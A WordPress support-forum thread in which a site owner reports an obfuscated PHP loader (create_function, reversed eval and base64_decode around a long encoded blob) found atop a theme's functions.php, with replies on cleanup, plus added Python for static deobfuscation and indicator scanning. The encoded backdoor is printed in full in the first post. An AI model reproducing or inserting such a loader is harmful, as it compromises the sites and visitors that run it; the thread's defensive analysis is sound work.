Functions.Php Question

  • #14916
    futurewebboss
    Customer

      I just got an alert from WordFence security that “This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: ‘edoced_46esab(’.”

      I went and looked at the functions.php file, and at the very top of the file the text is as follows:
      <?php $kfpclx=chr(99).”\x72″.chr(101).”a”.”t”.”\x65″.”\x5f”.”\x66″.”u”.chr(110).”c”.”\x74″.”\x69″.”\x6f”.”n”;$fxnfan = $kfpclx(‘$a’,strrev(‘;)a$(lave’)); $fxnfan(strrev(‘;))”==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”(edoced_46esab(lave’));?><?php

      Then following this is the “start the engine” line of code.
      Not sure what to do here.
      Any guidance?
      Thanks

      Dan
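
What the wrapper at the top of that functions.php does, as an added example that is not part of the original post: the chr()/"\xNN" concatenation assigned to $kfpclx spells out the name create_function, strrev(';)a$(lave') is eval($a);, and the long single-quoted argument of the second strrev() is eval(base64_decode("...")); written backwards, which is why Wordfence matched on the literal string edoced_46esab(. The Python below is my own code (not the theme's, Appfinite's or Wordfence's) and rebuilds those pieces statically, without executing anything. It runs on a constructed sample (SAMPLE) that has the same wrapper shape with a harmless payload in place of the blob from the post; the real blob is neither reproduced nor decoded here.

```python
import base64
import re

# Constructed sample: the same wrapper shape as the line at the top of the
# poster's functions.php, but carrying a harmless payload. The real blob from
# the post is not reproduced here.
PAYLOAD = 'echo "hello from the payload";'
_REVERSED_B64 = base64.b64encode(PAYLOAD.encode()).decode()[::-1]
SAMPLE = (
    r'<?php $kfpclx=chr(99)."\x72".chr(101)."a"."t"."\x65"."\x5f"."\x66"."u"'
    r'.chr(110)."c"."\x74"."\x69"."\x6f"."n";'
    "$fxnfan = $kfpclx('$a',strrev(';)a$(lave'));"
    "$fxnfan(strrev(';))\"" + _REVERSED_B64 + "\"(edoced_46esab(lave'));?><?php"
)

_FRAGMENT = re.compile(r'chr\((\d+)\)|"((?:\\x[0-9a-fA-F]{2}|[^"\\])*)"')
_CONCAT_ASSIGN = re.compile(
    r'\$\w+\s*=\s*((?:chr\(\d+\)|"[^"]*")(?:\s*\.\s*(?:chr\(\d+\)|"[^"]*"))*)\s*;'
)
_STRREV_ARG = re.compile(r"strrev\('([^']*)'\)")
_B64_ARG = re.compile(r'base64_decode\("([^"]*)"\)')


def decode_concat(expr: str) -> str:
    """Evaluate a PHP string built from chr(N) and "\\xNN"/plain fragments
    joined with '.', the trick used here to hide the name create_function."""
    out = []
    for m in _FRAGMENT.finditer(expr):
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        else:
            out.append(re.sub(r"\\x([0-9a-fA-F]{2})",
                              lambda h: chr(int(h.group(1), 16)), m.group(2)))
    return "".join(out)


def deobfuscate(php_source: str) -> dict:
    """Unwrap the create_function(strrev) / eval(base64_decode(strrev)) layers.

    Returns the rebuilt function name, the body handed to create_function,
    the un-reversed wrapper string and the base64-decoded payload. Nothing
    is executed."""
    m = _CONCAT_ASSIGN.search(php_source)
    builder = decode_concat(m.group(1)) if m else None
    reversed_args = _STRREV_ARG.findall(php_source)
    if len(reversed_args) < 2:
        raise ValueError("expected two strrev() arguments")
    body = reversed_args[0][::-1]      # "eval($a);"
    wrapper = reversed_args[1][::-1]   # 'eval(base64_decode("..."));'
    b64 = _B64_ARG.search(wrapper)
    if b64 is None:
        raise ValueError("no base64_decode() call in un-reversed wrapper")
    payload = base64.b64decode(b64.group(1)).decode("utf-8", errors="replace")
    return {"builder": builder, "body": body, "wrapper": wrapper, "payload": payload}


# Cheap static signals that need no decoding; the first is what Wordfence hit.
INDICATORS = {
    "edoced_46esab(": "base64_decode( written backwards for strrev()",
    "strrev('": "literal hidden by reversing it",
    "(lave": "eval( written backwards",
}


def indicators(php_source: str) -> list:
    """Return the indicator strings present plus the chr()/\"\\xNN\" pattern."""
    found = [k for k in INDICATORS if k in php_source]
    if re.search(r'chr\(\d+\)\s*\.\s*"\\x[0-9a-fA-F]{2}"', php_source):
        found.append('chr()."\\xNN" function-name assembly')
    return found


if __name__ == "__main__":
    print("indicators:", indicators(SAMPLE))
    for k, v in deobfuscate(SAMPLE).items():
        print(f"{k}: {v}")
```

Two points worth keeping in mind when using this on a real file: the payload recovered from the first layer is often itself another strrev/base64/gzinflate layer, so the decode usually has to be repeated, and it should be done on a copy of the file offline, never by running the PHP. The indicator strings are the ones a plain grep over wp-content can look for across the whole install, since an intruder who wrote one backdoor rarely stops at one file.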

      #14917
      Eric
      Customer

        That malicious code isn’t in any of the themes I have from Appfinite. Where did you download this theme from? If you downloaded it from Appfinite directly, then it definitely won’t have any malicious code (I just checked all of the versions that I have)… but if you’ve downloaded from someone else on the outside, then they could have very well added in something malicious in an attempt to hack you. This is why everyone in WordPress recommends downloading themes from the people/company that actually made the theme, to avoid something like this.

        If you did download from Appfinite ONLY, then that means you have something else wrong with your site (unrelated to the child theme). It’s definitely not from the theme, as there isn’t any way for them to do so through the child theme itself. It could be a plugin, or any type of vulnerable code that could have been added in manually. This is the first time I’ve ever seen something like this mentioned on this site, and since I know Genesis is known for good security, I can assume there must be something else causing the issue.

        I would contact your host ASAP to see if they can figure out what’s going on. They should have the tools to find out exactly where and how whoever was able to hack into your account did it.


        I create awesome sites for awesome people! Contact me if interested – ericsanchez1585@gmail.com

        #14918
        futurewebboss
        Customer

          I don’t see this encoding in the inSync theme I downloaded, so it got added, but what’s strange is that when I look at the file in FTP the last mod date was 12/14 of 2014. Any insight would be appreciated. The permissions on the file are 644.

          #14919
          futurewebboss
          Customer

            Yeah, it came from Appfinite. Can I just delete the section? Can’t get in touch with the host unfortunately. It’s a client site and I have to wait until tomorrow AM. What to do?

            #14920
            Eric
            Customer

              Yes, you could delete that section, but I can’t promise that will fix the issue. Since it doesn’t appear to be a theme issue, that means that someone somehow has or had access to your account in some kind of way. So if they’ve added code into that file before, I’m not sure if they’ll be able to repeat it or not. I would reset your passwords and check any outdated plugins to make sure everything is up to date. This is definitely an unusual thing, and I would take immediate action to try and at least prevent it from happening in the future.


              #14921
              futurewebboss
              Customer

                Agreed. I just scanned with Sucuri and no malware was found, and there is no admin account and I’m using a very secure p/w. Thanks for the immediate reply, Eric. I’m leery of deleting the lines in the code. Guess I should back up functions.php anyway even though it might be suspicious. Or wait until the AM to call the host.

                #14922
                futurewebboss
                Customer

                  When browsing WordFence security the only allowed user login was from me. All other attempts trying to hack the admin account (which is non existent) were blocked by WordFence.
                  And as mentioned FTP shows last mod of the functions.php was on 12/14. I’ll leave it for now but if I learn anything from this I will share for the benefit of others.
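
A check on the "last mod of 12/14" point above, as an added example that is not part of the thread: the modification time an FTP client lists is the file's mtime, and anyone who can write the file can also set its mtime to any value (touch(1), PHP's touch(), or the FTP MFMT command), so an old mtime says nothing about when the wrapper was inserted. On Linux and other Unix filesystems the inode change time (ctime) is set by the kernel on every write or metadata change and cannot be set from userland, so a ctime far ahead of the mtime means the mtime was rewritten after the last real change (or that the file was copied or unpacked with timestamps preserved, which has to be ruled out). The Python below is my own triage code, not Wordfence's or Sucuri's; the indicator list and the two-file tree it builds under a temp directory are constructed for the demonstration. It greps every .php file under a root for the wrapper's tell-tale strings and reports mode, mtime and ctime for any hit.

```python
import os
import stat
import tempfile
import time
from pathlib import Path

# Strings worth grepping for across wp-content; the first is the one
# Wordfence matched in the poster's functions.php.
IOC_STRINGS = (b"edoced_46esab(", b"strrev('", b"base64_decode(", b"create_function(")


def scan_php(root, iocs=IOC_STRINGS):
    """Return {path: [ioc, ...]} for every .php file under root containing
    at least one indicator string."""
    findings = {}
    for p in sorted(Path(root).rglob("*.php")):
        data = p.read_bytes()
        hits = [i.decode() for i in iocs if i in data]
        if hits:
            findings[str(p)] = hits
    return findings


def timestamp_report(path, min_gap_seconds=60):
    """Compare the mtime an FTP listing shows against the inode change time.

    mtime is writable by whoever can write the file; ctime is kernel-set on
    Unix and cannot be backdated from userland, so ctime well ahead of mtime
    means the mtime was rewritten after the last change (or the file was
    copied/unpacked with preserved timestamps, which the caller must rule
    out). On Windows st_ctime is the creation time and this test does not
    apply."""
    st = os.stat(path)
    fmt = "%Y-%m-%d %H:%M:%S"
    return {
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "mtime": time.strftime(fmt, time.localtime(st.st_mtime)),
        "ctime": time.strftime(fmt, time.localtime(st.st_ctime)),
        "mtime_backdated": (st.st_ctime - st.st_mtime) > min_gap_seconds,
    }


def demo():
    """Constructed tree: one file carrying the wrapper's tell-tale strings with
    a backdated mtime, one clean file. Returns everything the checks produce."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    bad = root / "functions.php"
    bad.write_bytes(
        b"<?php $fxnfan(strrev(';))\"...\"(edoced_46esab(lave'));?><?php\n"
        b"// start the engine\n"
    )
    good = root / "helpers.php"
    good.write_bytes(b"<?php function noop() {} ?>\n")
    os.chmod(bad, 0o644)
    # Backdate the infected file's mtime by a year, as the intruder could have.
    old = time.time() - 365 * 86400
    os.utime(bad, (old, old))
    return {
        "bad": str(bad),
        "good": str(good),
        "findings": scan_php(root),
        "bad_times": timestamp_report(bad),
        "good_times": timestamp_report(good),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Run it against the real install as scan_php("/path/to/wp-content") and timestamp_report() on each hit; the 644 mode seen in the thread is irrelevant to how the code got there, since the web server (or the FTP account) is the owner and can write the file regardless. A host's access and FTP logs around the ctime, not the mtime, are where to look for the write.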

                  #14925
                  Eric
                  Customer

                    Yes please let us know if you can. Hopefully everything gets fixed.

